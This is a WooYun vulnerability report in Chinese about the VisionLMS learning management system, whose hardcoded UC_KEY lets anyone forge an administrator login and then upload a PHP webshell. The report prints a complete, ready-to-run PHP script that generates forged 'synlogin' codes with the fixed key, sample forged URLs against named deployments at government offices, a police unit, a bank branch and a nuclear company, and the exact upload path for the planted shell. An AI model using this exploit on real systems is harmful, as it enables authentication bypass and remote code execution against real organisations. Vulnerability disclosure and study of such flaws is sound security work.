当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168072

漏洞标题:VisionLMS学习管理系统漏洞可Getshell

相关厂商:VisionLMS

漏洞作者: 艺术家

提交时间:2016-01-13 17:42

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

8年研发历程, 2500家使用客户, 遍布零售、制造、能源、政府、教育等8大行业, 15个城市

详细说明:

其知名用户有:

1.jpg


因为这种平台基本都放在内网里面,可以影响内网安全
http://**.**.**.** (官网)
-----
如果发现不能重现,请再次用代码生成。不能就多试几次。
案例1(官网演示):
http://**.**.**.**/lms/api/uc.php?code=e5f50oMXJKnK1VqWbHMVpdzcY3dERHtRqPVP3dj23hmU%2BjPEZ9MKjgyfw5c7FcfXKkw9RhpY4oNep6eNmTmC3RPP4THNbT7IbkVOOIqQekI
http://**.**.**.**/lms/index.php

0.jpg


00.jpg


案例2:
http://**.**.**.**/lms/api/uc.php?code=fd3f3Lr9%2FJWuB7q8e2C3dLa7xdOcmTm3ajqatGVQHWCn0QSzYQWvXlGV8INuNJVRXzE%2BxbSqaPjTtdR7V3iXhXpZwFsyWfhPe2800x%2BcT9A
http://**.**.**.**/lms/index.php?s=Home/Home/index

1.jpg


11.jpg


案例3:
http://**.**.**.**/lms/api/uc.php?code=e5f50oMXJKnK1VqWbHMVpdzcY3dERHtRqPVP3dj23hmU%2BjPEZ9MKjgyfw5c7FcfXKkw9RhpY4oNep6eNmTmC3RPP4THNbT7IbkVOOIqQekI
http://**.**.**.**/lms/?c=Home.Home

2.jpg


22.jpg


案例4:
**.**.**.**/lms/api/uc.php?code=e5f50oMXJKnK1VqWbHMVpdzcY3dERHtRqPVP3dj23hmU+jPEZ9MKjgyfw5c7FcfXKkw9RhpY4oNep6eNmTmC3RPP4THNbT7IbkVOOIqQekI
**.**.**.**/?c=Cvicse.Index&m=indexAction

3jpg.jpg


33.jpg


案例5:
http://**.**.**.**:8089/lms/api/uc.php?code=20d2JMOG3tpWjbBtKvt95Uy+1Cl6m8n44XWRySQGFfbMblkO7R16V6sOg971fqL7UovkwWzV7I3DMGAUBFtA65cvranX2aTiimpQqCCTW+E
http://**.**.**.**:8089/

4.jpg


44.jpg


**.**.**.**/lms/ 山东省财政
http://**.**.**.**/lms/ 华东理工
http://**.**.**.**/lms/index.php 浙江交通
http://**.**.**.**/lms/index.php?s=Index/Index/login
**.**.**.**/lms/
-------
http://**.**.**.**//lms/
**.**.**.**/lms/index.php
http://**.**.**.**/lms/index.php 浙江交通
http://**.**.**.**/lms/index.php?s=Index/Index/login
http://**.**.**.**/lms/index.php?s=Index/Index/login
**.**.**.**/lms/index.php 长春市公安局交通警察支队
**.**.**.**/lms/ 山东省财政
http://**.**.**.**/lms/ 华东理工
更多客户有
南航天合培训管理系统

1.jpg


中国建设银行四川省分行

2.jpg


中核集团江苏核电有限公司

3.jpg


利用可以查看:http://**.**.**.**/bugs/wooyun-2016-0168065

漏洞证明:

0x0
/lms/api/uc_config.php
发现UC_KEY值所有程序都是一个固定值。define("UC_KEY", "zlms@**.**.**.**");
既然知道UC_key的固定值。在uc上面基本是可以构建任意用户登陆。
直接看一下authcode函数简单构造下加解密:

<?php
/**
* $string 明文或密文
* $operation 加密ENCODE或解密DECODE
* $key 密钥
* $expiry 密钥有效期
*/
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
// 动态密匙长度,相同的明文会生成不同密文就是依靠动态密匙
// 加入随机密钥,可以令密文无任何规律,即便是原文和密钥完全相同,加密结果也会每次不同,增大破解难度。
// 取值越大,密文变动规律越大,密文变化 = 16 的 $ckey_length 次方
// 当此值为 0 时,则不产生随机密钥
$ckey_length = 4;

// 密匙
// $GLOBALS['discuz_auth_key'] 这里可以根据自己的需要修改
$key = md5($key ? $key : $GLOBALS['discuz_auth_key']);

// 密匙a会参与加解密
$keya = md5(substr($key, 0, 16));
// 密匙b会用来做数据完整性验证
$keyb = md5(substr($key, 16, 16));
// 密匙c用于变化生成的密文
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
// 参与运算的密匙
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
// 明文,前10位用来保存时间戳,解密时验证数据有效性,10到26位用来保存$keyb(密匙b),解密时会通过这个密匙验证数据完整性
// 如果是解码的话,会从第$ckey_length位开始,因为密文前$ckey_length位保存 动态密匙,以保证解密正确
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
// 产生密匙簿
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
// 用固定的算法,打乱密匙簿,增加随机性,好像很复杂,实际上并不会增加密文的强度
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
// 核心加解密部分
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
// 从密匙簿得出密匙进行异或,再转成字符
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
// substr($result, 0, 10) == 0 验证数据有效性
// substr($result, 0, 10) - time() > 0 验证数据有效性
// substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16) 验证数据完整性
// 验证数据有效性,请看未加密明文的格式
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
// 把动态密匙保存在密文里,这也是为什么同样的明文,生产不同密文后能解密的原因
// 因为加密后的密文可能是一些特殊字符,复制过程可能会丢失,所以用base64编码
return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>


$_G['time'] =  time()+10*36000;
$_G['action'] = 'synlogin';
$_G['uid'] = "1";
$_G['username'] = "root";
$code = urlencode(_authcode(http_build_query($_G), 'ENCODE'));
echo 'http://x/lms/api/uc.php?code='.$code;


加入一个数组就行了。
基本有了UC_KEY,所有用生成的key是所有都可以通用的。
这里用官网的demo网站演示:http://**.**.**.**/
http://**.**.**.**//lms/api/uc.php?code=353etSSAKUxHGQOKjxuiSuGJ1wlD1YQuNPHoUcASALEGO45W9ZnoTWMVbQnumVVjJVjPeChxYrMyF/jvlx77s9l+Xp4eDNa9aWEpzMuyrH0
返回值为1

111.jpg


再访问http://**.**.**.**/lms/?c=Admin.Index&m=admin_main

222.jpg


进入后台可以拿shell。
0x01
打开:资源管理->知识管理->新增知识库内容

2.jpg


0x02
到第二步随便填,第三步叫你上传压缩包,
新建一个压缩包 然后新建一个目录,在目录里放入木马文件就可以了。
再到前台首页去查看文章

3.jpg


4.jpg


点击一下就OK了。上传的文件为
**.**.**.**/czt_lms_data/czt_lms_file/storage/attachment/kb/29/n_n.php
其中29不用改,N_N.php为你上传的上马。
如果不能上传是已经把上传权限关闭
案例:
其知名用户有:

1.jpg


验证脚本:

<?php 
$_G['time'] = time()+10*36000;
$_G['action'] = 'synlogin';
$_G['uid'] = "1";
$_G['username'] = "root";
$code = urlencode(_authcode(http_build_query($_G), 'ENCODE'));
echo 'http://**.**.**.**/lms/api/uc.php?code='.$code;
function _authcode($string, $operation = 'DECODE', $key = 'zlms@**.**.**.**', $expiry = 0) {
$ckey_length = 4;
$key = md5($key);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>


生成访问API请求:

xxxx.jpg


修复方案:

版权声明:转载请注明来源 艺术家@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价

  1. 2016-03-01 09:54 | 艺术家 ( 普通白帽子 | Rank:269 漏洞数:68 | 我觉得我像个艺术家。)

    @Finger 通用漏洞,没$,没RANK